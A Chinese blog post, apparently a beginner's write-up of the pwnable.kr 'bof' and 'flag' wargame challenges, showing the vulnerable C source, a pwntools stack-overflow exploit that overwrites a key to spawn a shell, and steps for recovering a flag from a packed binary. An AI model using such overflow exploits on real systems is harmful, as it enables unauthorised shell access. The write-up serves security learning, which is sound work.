小白pwn之旅之pwnable02

最新推荐文章于 2024-01-12 19:51:43 发布
最新推荐文章于 2024-01-12 19:51:43 发布
阅读量190 收藏
点赞数
文章标签: gdb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41078843/article/details/105807168
版权

pwnable----bof和flag

bof是溢出
flag是加了壳

bof

在这里插入图片描述

  1. 直接访问上面的两个网址,下载bof和bof.c。用file bof查看bof文件,并用IDA打开

在这里插入图片描述
2.查看源代码bof.c

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

3.分析

1.首先看main,将func传入了0xdeadbeef。看func函数,直接看到了/bin/sh(这个,太香了~),看判断条件要将传入的数key===0xcafeebabe
2.我们就要找覆盖多少地址才能将0xdeadbeef改成0xcafebabe,就能getshell,直接在IDA上查找func函数看到地址为0x2c和0x8,相和为52.

4.exp编写

from pwn import *
p = remote('pwnable.kr',9000)
p.send('A'*52 + p32(0xcafebabe))
p.interactive()

在这里插入图片描述

看到flag

flag

1.看题发现只有一个文件,怎么办嘛,看看文件属性file flag,发现加了壳了,用upx -d 解压,在在IDA上就能看到flag ,但我在网上还看到另一种解法写下

2.先用strace ./flag 调试一下看到一行就是运行flag文件,在看到brk然后就是一些写,最后显示结果I will…,最后退出
在这里插入图片描述
我们在用gdb调试一下
在这里插入图片描述
在最后退出的时候我们catch它,在r运行让它报错
在将用core 保存起来
这个时候我们查看我们的core
最后在strings flag-core

在这里插入图片描述
最后在strings flag-core

在这里插入图片描述

最后在茫茫代码看到:)这个就是flag
在这里插入图片描述

轩冕
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
小白初学pwn(一)
小明的小书包Ya
09-12 2039
小白初学pwn 安装pwntools pip install pwntools 坑:最好使用Python2版本去运行你的脚本 进入Python交互环境测试一下我们的pwn是否安装好了 ⚡ root@kncc  /work/ctf/pwn-demo  python Python 2.7.15+ (default, Aug 31 2018, 11:56:52) [GCC 8.2.0...
pwn学习(1)
空舟的博客
11-30 613
pwn简介 ”Pwn”是一个黑客语法的俚语词 ,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵了
(BUUCTF)pwnable_bf
xy1458214551的博客
01-12 396
BUUCTF的pwnable_bf题解
pwnable.kr - brain fuck
加号减减号的博客
03-06 835
题目简介 分析 writeup 题目简介 Brain fuck 是 pwnable.kr 第二阶段的第一道题,考察了覆些 GOT 表等知识点。题目信息如下: 分析 将下载得到的 bf 文件拖进 IDA 中查看,发现程序主要由 main 函数以及 do_brainfuck 函数组成,且没有开启 PIE。 main 函数如下: int __cdecl main...
pwnable BrainFuck,GOT表重写
nibiru_holmes的博客
03-10 1185
题目链接:http://pwnable.kr/play.php BrainFuck是什么鬼,百度一下..... Brainfuck是一种极小化的计算机语言,它是由Urban Müller在1993年创建的。由于fuck在英语中是脏话,这种语言有时被称为brainf*ck或brainf**k,甚至被简称为BF。 其实就是闲着没事做出来的一种语言。 看看
pwnable.tw - orw
不急不躁
07-09 3033
简单概览 与 start 不同,该程序使用动态链接 提示仅允许有限的系统调用 open read write 函数 程序运行 哪怕是输入一个字母,程序仍然会出现段错误 检查安全措施 可见栈上开了 CANARY 程序 在 IDA 中反编译可见: 函数 orw_seccomp 反编译: 程序从终端读入内容,存放在 shellcode,然后执行该命令 ...
buuoj Pwn writeup 256-260
yongbaoii的博客
09-01 302
256 ciscn_2019_s_2 257 qwb2019_one 258 hxb_pwn300 259 others_easyheap 260 pwnable_bf # -*- coding: utf-8 -*- '''#coding:utf8 from pwn import * #预先生成一个可以pass的payload payload = '' for i in range(50): payload += '0' payload += p8(0x100-0x40 +
awd的批量脚本 pwn_记一次AWD反杀之旅
weixin_39611340的博客
12-20 1167
背景星盟团队的内部awd训练,邀请我们团队参加,然后想着也没什么事情就报名了。为什么说叫反杀之旅?因为最开始的时候由于技术师傅的手误,前两轮设置后台check扣分的时候多按了一个0,导致一次check扣了我们1000分。。。本来每个队初始分数是1000,结果我们一下变成了0,成了倒数第一。不过经过团队的紧张的补救以及多年的手速,在多扣了几百分的情况下最后追赶到了正数第二名的位置。觉得还挺有意思,所...
PWN入门之数组越界-附件资源
03-05
PWN入门之数组越界-附件资源
Ctfshow pwn 02(自己做出的第一道pwn题)
weixin_64875092的博客
12-05 5314
算是一篇第一次做出pwn题的日记了! 本文写给想要入门pwn但只安装好虚拟机和ida完全不知道怎么用的小白~ 有许多写的不严谨或无脑的地方请多包涵! 其中有许多我在做题时踩到的坑(因为自己零基础实在不知道怎么问也不知道去问谁而导致浪费好多时间而进行不下去) 现在开始! 首先第一步,来到ctfshow的网站,找到这道pwn02 之后点击Launch an instance(这所是一个建立连接的步骤,少了这一步在使用python3时会出现如下报错)如果问我什么是python3,请耐心看下去
pwn学习:pwnable.kr bof
Richard_pl的博客
03-12 457
Day 3: Study pwn via pwnable.kr——bof 写在前面: 记录自己的学习过程,从零开始。。。第三天!!! 首先下载文件 打开.c文件查看源码 可以看出本次的最终目标就是覆盖key值。漏洞可能在gets函数上。 使用gdb打开二进制文件 也可以通过IDA进行分析 打开文件,查看文件开启的保护措施并设置若干断点。 通过汇编程序查找到相关变量的地址 我们的最终目的...
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 210
BUUCTF 做题练习
小白pwn之旅pwnable10
qq_41078843的博客
05-28 209
Pwnable-----Brain Fuck 1.准备 将这两个文件下载到ubuntu. 什么是.so文件? SO文件格式即ELF文件格式,它是Linux下可执行文件,共享库文件和目标文件的统一格式。这个像是一个依赖。 2.分析 还是老样子,我们看看文件属性 1.将bf拖到我们的破解大法IDA pro中 看看main()中的三个函数:puts() ,memset(), fget(). 再联想到题目竟然给出了libc.so 这多次一举的做法明显是让我们通过修改GOT表,从而修改函数。 刚好 m
pwnable brain fuck(bss段的用途)
九层台
09-26 648
题目链接传送门 这里题目跟网鼎杯线下赛的一个pwn有些相似。 输入一些字符可以控制一个指针,可以向这个指针指向的地址处写数据。 首先要知道bss段里面有什么。 在这道题里面的p指针的更高地址处是stdin,stdout,stderr然后是函数的got表,这里可以控制指针p泄露和修改got表。 #coding=utf-8 from pwn import * p=0x0804a0a0 putcha...
Pwnable小结
Juny0117的博客
12-09 677
用这一会闲着没啥事,就把之前做的pwnable上面的题来总结下吧。 0x01 fd: 源码: 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <string.h> 4 char buf[32]; 5 int main(int argc, char* argv[], ...
基于微信小程序的在线学习系统设计与实现.docx
08-29
基于微信小程序的在线学习系统设计与实现.docx
mayaABC文件建模李小龙动作B
08-29
mayaABC文件建模李小龙动作A,一整套的建模abc数据有动作
微专题 新情景条件下氧化还原反应方程式的书写 (1).pdf
最新发布
08-29
微专题 新情景条件下氧化还原反应方程式的书写 (1).pdf
新增数字经济专利等20多份数字经济学术资源大合集(全新整理)
08-29
1、资源内容地址:https://blog.csdn.net/2301_79696294/article/details/141267034 2、代码特点:今年全新,手工精心整理,放心引用,数据来自权威,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 3、适用对象:大学生,本科生,研究生小白可用,容易上手!!! 3、课程引用: 经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理 数据指标说明 一、新经济指数(2017-2022) 二、数字经济发展白皮书2017-2021年 三、北京大学商业银行数字化转型指数(2010-2021年) 四-1 全国31省数字经济测算2013-2020 四-2 全国31省数字经济发展测算指标 五、 中国城市数字经济指数(2017-2021) 六、中国城市数字经济成分(2011-2019) 七、《2018-2020县域数字乡村指数》 八、企业级数字经济核心产业专利
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值